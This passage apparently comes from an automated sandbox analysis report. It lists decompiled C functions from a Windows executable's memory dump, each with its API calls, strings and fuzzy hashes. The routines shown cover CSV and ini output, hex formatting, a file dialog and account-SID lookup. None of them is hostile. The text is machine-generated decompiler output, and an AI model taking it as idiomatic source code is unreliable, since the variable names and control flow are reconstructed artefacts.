                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _v16;
                                                                                                                				wchar_t* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				char _v36;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t39;
                                                                                                                				wchar_t* _t41;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t48;
                                                                                                                				wchar_t* _t53;
                                                                                                                				wchar_t* _t62;
                                                                                                                				void* _t66;
                                                                                                                				intOrPtr* _t68;
                                                                                                                				void* _t70;
                                                                                                                				wchar_t* _t75;
                                                                                                                				wchar_t* _t79;
                                                                                                                
                                                                                                                				_t66 = __ebx;
                                                                                                                				_t75 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
                                                                                                                						_t68 = _a8;
                                                                                                                						if(_t68 != _t75) {
                                                                                                                							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
                                                                                                                						} else {
                                                                                                                							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
                                                                                                                						}
                                                                                                                						_t41 = wcschr(_t79, 0x2c);
                                                                                                                						_pop(_t70);
                                                                                                                						if(_t41 != 0) {
                                                                                                                							L8:
                                                                                                                							_v20 = _t75;
                                                                                                                							_v28 = _t75;
                                                                                                                							_v36 = _t75;
                                                                                                                							_v24 = 0x100;
                                                                                                                							_v32 = 1;
                                                                                                                							_v16 = 0x22;
                                                                                                                							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                                							while(1) {
                                                                                                                								_t45 =  *_t79 & 0x0000ffff;
                                                                                                                								__eflags = _t45;
                                                                                                                								_v12 = _t45;
                                                                                                                								_t77 =  &_v36;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								__eflags = _t45 - 0x22;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_push( &_v12);
                                                                                                                									_t48 = 1;
                                                                                                                									__eflags = 1;
                                                                                                                								} else {
                                                                                                                									_push(L"\"\"");
                                                                                                                									_t48 = _t45 | 0xffffffff;
                                                                                                                								}
                                                                                                                								E0040565D(_t48, _t70, _t77, __eflags);
                                                                                                                								_t79 =  &(_t79[0]);
                                                                                                                								__eflags = _t79;
                                                                                                                							}
                                                                                                                							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                                							_t53 = _v20;
                                                                                                                							__eflags = _t53;
                                                                                                                							if(_t53 == 0) {
                                                                                                                								_t53 = 0x40c4e8;
                                                                                                                							}
                                                                                                                							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
                                                                                                                							_t75 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							_t62 = wcschr(_t79, 0x22);
                                                                                                                							_pop(_t70);
                                                                                                                							if(_t62 != 0) {
                                                                                                                								goto L8;
                                                                                                                							} else {
                                                                                                                								E00407343(_t66, _a4, _t79);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
                                                                                                                							E00407343(_t66, _a4, ",");
                                                                                                                						}
                                                                                                                						_v8 = _v8 + 1;
                                                                                                                					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t66, _a4, L"\r\n");
                                                                                                                			}
























                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 004073A4
                                                                                                                • wcschr.MSVCRT ref: 004073B2
                                                                                                                  • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                  • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                				char _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				char _v80;
                                                                                                                				signed short _v65616;
                                                                                                                				void* _t27;
                                                                                                                				intOrPtr _t28;
                                                                                                                				void* _t34;
                                                                                                                				intOrPtr _t39;
                                                                                                                				intOrPtr* _t51;
                                                                                                                				void* _t52;
                                                                                                                
                                                                                                                				_t51 = __esi;
                                                                                                                				E0040B550(0x1004c, __ecx);
                                                                                                                				_t39 = 0;
                                                                                                                				_push(0);
                                                                                                                				_push( &_v8);
                                                                                                                				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                                                				_push(L"Lines");
                                                                                                                				_t27 =  *((intOrPtr*)( *__esi))();
                                                                                                                				if(_v8 > 0) {
                                                                                                                					do {
                                                                                                                						_t6 = _t39 + 1; // 0x1
                                                                                                                						_t28 = _t6;
                                                                                                                						_push(_t28);
                                                                                                                						_push(L"Line%d");
                                                                                                                						_v12 = _t28;
                                                                                                                						_push(0x1f);
                                                                                                                						_push( &_v80);
                                                                                                                						L0040B1EC();
                                                                                                                						_t52 = _t52 + 0x10;
                                                                                                                						_push(0x7fff);
                                                                                                                						_push(0x40c4e8);
                                                                                                                						if( *((intOrPtr*)(_t51 + 4)) == 0) {
                                                                                                                							_v65616 = _v65616 & 0x00000000;
                                                                                                                							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
                                                                                                                							_t34 = E004054DF(_a4, _t51,  &_v65616);
                                                                                                                						} else {
                                                                                                                							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
                                                                                                                						}
                                                                                                                						_t39 = _v12;
                                                                                                                					} while (_t39 < _v8);
                                                                                                                					return _t34;
                                                                                                                				}
                                                                                                                				return _t27;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: Line%d$Lines
                                                                                                                • API String ID: 3988819677-2790224864
                                                                                                                • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v26;
                                                                                                                				void _v28;
                                                                                                                				void* _t24;
                                                                                                                				void* _t25;
                                                                                                                				void* _t35;
                                                                                                                				signed int _t38;
                                                                                                                				signed int _t42;
                                                                                                                				void* _t44;
                                                                                                                				void* _t45;
                                                                                                                
                                                                                                                				_t24 = _a12;
                                                                                                                				_t45 = _t44 - 0x18;
                                                                                                                				_t42 = 0;
                                                                                                                				 *_t24 = 0;
                                                                                                                				if(_a8 <= 0) {
                                                                                                                					_t25 = 0;
                                                                                                                				} else {
                                                                                                                					_t38 = 0;
                                                                                                                					_t35 = 0;
                                                                                                                					if(_a8 > 0) {
                                                                                                                						_v8 = _t24;
                                                                                                                						while(1) {
                                                                                                                							_v28 = _v28 & 0x00000000;
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosw");
                                                                                                                							_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                							_push(L"%2.2X ");
                                                                                                                							_push(0xa);
                                                                                                                							_push( &_v28);
                                                                                                                							L0040B1EC();
                                                                                                                							_t38 = _t42;
                                                                                                                							memcpy(_v8,  &_v28, 6);
                                                                                                                							_t13 = _t42 + 3; // 0x3
                                                                                                                							_t45 = _t45 + 0x1c;
                                                                                                                							if(_t13 >= 0x2000) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_v8 = _v8 + 6;
                                                                                                                							_t35 = _t35 + 1;
                                                                                                                							_t42 = _t42 + 3;
                                                                                                                							if(_t35 < _a8) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t24 = _a12;
                                                                                                                					}
                                                                                                                					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                                                                					_t25 = 1;
                                                                                                                				}
                                                                                                                				return _t25;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
                                                                                                                			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				char _v44;
                                                                                                                				intOrPtr _t22;
                                                                                                                				signed int _t30;
                                                                                                                				signed int _t34;
                                                                                                                				void* _t35;
                                                                                                                				void* _t36;
                                                                                                                
                                                                                                                				_t35 = __esi;
                                                                                                                				_t34 = 0;
                                                                                                                				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
                                                                                                                						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
                                                                                                                						L0040B1EC();
                                                                                                                						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
                                                                                                                						_push( &_v44);
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(__esi + 0x60)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t36 = _t36 + 0x24;
                                                                                                                						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
                                                                                                                						_t34 = _t34 + 1;
                                                                                                                					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t35, _a4, L"\r\n");
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: %%-%d.%ds
                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				wchar_t* _v52;
                                                                                                                				intOrPtr _v56;
                                                                                                                				intOrPtr _v64;
                                                                                                                				intOrPtr _v68;
                                                                                                                				intOrPtr _v76;
                                                                                                                				struct tagOFNA _v80;
                                                                                                                
                                                                                                                				_v76 = __eax;
                                                                                                                				_v68 = _a4;
                                                                                                                				_v64 = 0;
                                                                                                                				_v44 = 0;
                                                                                                                				_v36 = 0;
                                                                                                                				_v32 = _a8;
                                                                                                                				_v20 = _a12;
                                                                                                                				_v80 = 0x4c;
                                                                                                                				_v56 = 1;
                                                                                                                				_v52 = __esi;
                                                                                                                				_v48 = 0x104;
                                                                                                                				_v28 = 0x81804;
                                                                                                                				if(GetOpenFileNameW( &_v80) == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					wcscpy(__esi, _v52);
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileNameOpenwcscpy
                                                                                                                • String ID: L
                                                                                                                • API String ID: 3246554996-2909332022
                                                                                                                • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                				void* __esi;
                                                                                                                				_Unknown_base(*)()* _t10;
                                                                                                                				void* _t12;
                                                                                                                				struct HINSTANCE__** _t13;
                                                                                                                
                                                                                                                				_t13 = __eax;
                                                                                                                				_t12 = 0;
                                                                                                                				if(E00408F72(__eax) != 0) {
                                                                                                                					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
                                                                                                                					if(_t10 != 0) {
                                                                                                                						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t12;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: LookupAccountSidW$Y@
                                                                                                                • API String ID: 190572456-2352570548
                                                                                                                • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040AD85(intOrPtr _a4) {
                                                                                                                				_Unknown_base(*)()* _t3;
                                                                                                                				void* _t7;
                                                                                                                				struct HINSTANCE__* _t8;
                                                                                                                				char** _t9;
                                                                                                                
                                                                                                                				_t7 = 0;
                                                                                                                				_t8 = E00405436(L"shlwapi.dll");
                                                                                                                				 *_t9 = "SHAutoComplete";
                                                                                                                				_t3 = GetProcAddress(_t8, ??);
                                                                                                                				if(_t3 != 0) {
                                                                                                                					_t7 =  *_t3(_a4, 0x10000001);
                                                                                                                				}
                                                                                                                				FreeLibrary(_t8);
                                                                                                                				return _t7;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                • String ID: shlwapi.dll
                                                                                                                • API String ID: 4092907564-3792422438
                                                                                                                • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00406597(wchar_t* __esi) {
                                                                                                                				wchar_t* _t2;
                                                                                                                				wchar_t* _t6;
                                                                                                                
                                                                                                                				_t6 = __esi;
                                                                                                                				E00404AD9(__esi);
                                                                                                                				_t2 = wcsrchr(__esi, 0x2e);
                                                                                                                				if(_t2 != 0) {
                                                                                                                					 *_t2 =  *_t2 & 0x00000000;
                                                                                                                				}
                                                                                                                				return wcscat(_t6, L"_lng.ini");
                                                                                                                			}






                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                • wcscat.MSVCRT ref: 004065B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                • String ID: _lng.ini
                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AC52() {
                                                                                                                				struct HINSTANCE__* _t1;
                                                                                                                				_Unknown_base(*)()* _t2;
                                                                                                                
                                                                                                                				if( *0x4101c4 == 0) {
                                                                                                                					_t1 = E00405436(L"shell32.dll");
                                                                                                                					 *0x4101c4 = _t1;
                                                                                                                					if(_t1 != 0) {
                                                                                                                						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                                                                						 *0x4101c0 = _t2;
                                                                                                                						return _t2;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t1;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                • API String ID: 946536540-880857682
                                                                                                                • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00406670(char** __esi, void* __eflags) {
                                                                                                                				char* _t30;
                                                                                                                				char** _t39;
                                                                                                                
                                                                                                                				_t39 = __esi;
                                                                                                                				 *__esi = "cf@";
                                                                                                                				__esi[0xb8] = 0;
                                                                                                                				_t30 = E00404FA4(0x338, __esi);
                                                                                                                				_push(0x14);
                                                                                                                				__esi[0xcb] = 0;
                                                                                                                				__esi[0xa6] = 0;
                                                                                                                				__esi[0xb9] = 0;
                                                                                                                				__esi[0xba] = 0xfff;
                                                                                                                				__esi[8] = 0;
                                                                                                                				__esi[1] = 0;
                                                                                                                				__esi[0xb7] = 1;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_push(0x14);
                                                                                                                				_t39[2] = _t30;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_push(0x14);
                                                                                                                				_t39[3] = _t30;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_push(0x14);
                                                                                                                				_t39[4] = _t30;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_t39[5] = _t30;
                                                                                                                				return _t39;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
